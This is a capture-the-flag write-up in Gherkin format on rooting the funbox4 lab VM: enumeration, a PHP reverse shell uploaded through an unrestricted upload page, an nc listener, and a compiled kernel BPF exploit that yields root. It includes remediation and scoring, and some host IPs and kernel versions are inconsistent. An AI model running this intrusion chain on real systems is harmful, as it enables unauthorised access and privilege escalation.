## Version 1.4.1
## language: en

Feature:
  TOE:
    funbox-ctf
  Category:
    File Upload
  Location:
    http://192.168.0.9/igmseklhgmrjmtherij2145236/upload.php
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
  Rule:
    REQ.043: https://fluidattacks.com/web/rules/043/
    REQ.040: The system must validate that the format (structure)
     of the files corresponds to its extension.
    REQ.041: The system must validate that the content of the files
     transferred to the same system is free of malicious code.
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Add type checks to restrict the uploadable file types

  Background:
  Hacker Software:
    | <Software name>   | <Version> |
    | Kali Linux        |  2020.3   |
    | Nmap              |  7.80     |
    | VirtualBox        |  6.1      |
    | Firefox           |  79.0     |
    | dirb              |  2.22     |
    | Gobuster          |  3.1.0    |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on Virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.0.1/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-23 10:26 EST
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.0047s latency).
    Nmap scan report for 192.168.0.3 (192.168.0.3)
    Host is up (0.085s latency).
    Nmap scan report for funbox4 (192.168.0.9)
    Host is up (0.0031s latency).
    Nmap scan report for kali (192.168.0.11)
    Host is up (0.00081s latency).
    Nmap done: 256 IP addresses (4 hosts up) scanned in 9.59 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.9
    """
    $ sudo nmap -sV -sS 192.168.0.11
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-23 10:28 EST
    Nmap scan report for funbox4 (192.168.0.9)
    Host is up (0.00029s latency).
    Not shown: 996 closed ports
    PORT    STATE SERVICE VERSION
    22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
    110/tcp open  pop3    Dovecot pop3d
    143/tcp open  imap    Dovecot imapd
    MAC Address: 08:00:27:C9:CF:2D (Oracle VirtualBox virtual NIC)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.11:80/
    And the Gemini Corp CTF homepage is displayed [evidences](02.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given the website does not show any vulnerabilities with the naked eye
    Then I proceeded to parse with dirb the directories on the server
    """
    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Wed Dec 23 12:29:12 2020
    URL_BASE: http://192.168.0.9/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612

    ---- Scanning URL: http://192.168.0.9/ ----
    + http://192.168.0.9/index.html (CODE:200|SIZE:11321)
    + http://192.168.0.9/server-status (CODE:403|SIZE:299)

    -----------------
    END_TIME: Wed Dec 23 12:29:14 2020
    DOWNLOADED: 4612 - FOUND: 2
    """
    Given the results I do not see anything useful
    Then I find a clue in the virtual machine description [evidences](03.png)
    And I look for some common generic files and directories in uppercase
    When I test with "ROBOTS.TXT" I get a result [evidences](04.png)
    Then I made a scan with gobuster taking as directory the previous result
    """
    $ ./gobuster dir -u http://192.168.0.9/igmseklhgmrjmtherij2145236/ -w
    /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php

    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.0.9/igmseklhgmrjmtherij2145236/
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.1.0
    [+] Extensions:              txt,php
    [+] Timeout:                 10s
    ===============================================================
    2020/12/23 13:03:46 Starting gobuster in directory enumeration mode
    ===============================================================
    /upload               (Status: 301) [Size: 338]
    /upload.php           (Status: 200) [Size: 319]

    ===============================================================
    2020/12/23 13:08:09 Finished
    ===============================================================
    """
    Given the results, upload.php may be vulnerable by LFI [evidences](05.png)

  Scenario: Exploitation
    Given the site is vulnerable to unrestricted file upload
    Then I use the script which is by default in kali-linux [evidences](06.png)
    And upload the file "php-revshell.php" [evidences](07.png)
    Then to use nc to listen to port 1234
    """
    nc -lvp 1234

    listening on [any] 1234 ...
    connect to [192.168.0.11] from funbox4 [192.168.0.9] 41428
    Linux funbox4 4.4.0-197-generic #229-Ubuntu SMP Wed Nov 25 11:05:42
    19:44:05 up  1:57,  0 users,  load average: 0.00, 0.00, 0.18
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    """
    Given the vulnerability it is used Interactive Terminal Spawned via Python
    """
    $ python3 -c "import pty;pty.spawn('/bin/bash')"
    www-data@funbox4:/$ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    www-data@funbox4:/$ uname -r
    4.4.0-21-generic
    """
    Given the current permissions it is necessary to escalate privileges
    Then I look for an exploit for the linux kernel [evidences](08.png)
    And the exploit is downloaded and compiled on the attacking machine
    """
    kali@kali:~/Downloads$ gcc 45010.c
    kali@kali:~/Downloads$ ls
    45010.c  a.out
    """
    Given the compiled file a.out the file is loaded in the vulnerable machine
    And the file is accessed, permissions are granted and it is executed
    """
    $ python3 -c "import pty;pty.spawn('/bin/bash')"
    www-data@funbox4:/$ cd /var/www/html/igmseklhgmrjmtherij2145236/upload
    www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ ls  -la
    total 96
    drwxrwxrwx 2 root     root      4096 Dec 23 21:34 .
    drwxr-xr-x 3 root     root      4096 Aug 29 18:43 ..
    -rw-r--r-- 1 www-data www-data 22280 Dec 23 20:13 a.out
    -rw-r--r-- 1 www-data www-data  5494 Dec 23 19:49 php-revshell.php
    www-data@funbox4:~/igmseklhgmrjmtherij2145236/upload$ chmod 777 a.out
    www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ ls  -la
    total 96
    drwxrwxrwx 2 root     root      4096 Dec 23 21:34 .
    drwxr-xr-x 3 root     root      4096 Aug 29 18:43 ..
    -rwxrwxrwx 1 www-data www-data 22280 Dec 23 20:13 a.out
    -rw-r--r-- 1 www-data www-data  5494 Dec 23 19:49 php-revshell.php
    www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ a.out

    [.]
    [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and
    linux-hardened t(-_-t)
    [.]
    [.]   ** This vulnerability cannot be exploited at all on authentic
    grsecurity kernel **
    [.]
    [*] creating bpf map
    [*] sneaking evil bpf past the verifier
    [*] creating socketpair()
    [*] attaching bpf backdoor to socket
    [*] skbuff => ffff88003856ff00
    [*] Leaking sock struct from ffff880000087a40
    [*] Sock->sk_rcvtimeo at offset 472
    [*] Cred structure at ffff8800384616c0
    [*] UID from cred structure: 33, matches the current: 33
    [*] hammering cred structure at ffff8800384616c0
    [*] credentials patched, launching shell...

    #id
    uid=0(root) gid=0(root) groups=0(root),33(www-data)
    """
    Given the new privileges, access the /root folder
    """
    # python3 -c "import pty;pty.spawn('/bin/bash')"python3 -c
    "import pty;pty.spawn('/bin/bash')"

    root@funbox4:/root# cd /root
    root@funbox4:/root# ls

    flag.txt
    root@funbox4:/root# cat flag.txt
    """
    Then the flag is read [evidences](09.png)

  Scenario: Remediation
    Given The website is vulnerable loaded files
    When The website is upload a file
    Then The file extensions must be verified
    And restrict the use of special characters "../ ..\ / \"

  Scenario: Scoring
   Severity scoring according to CVSSv3 standard
   Base: Attributes that are constants over time and organizations
     10/10 (high) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
   Temporal: Attributes that measure the exploit's popularity and fixability
     7/10 (high) - E:H/RL:O/RC:C
   Environmental: Unique and relevant attributes to a specific user environment
     7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-12-24
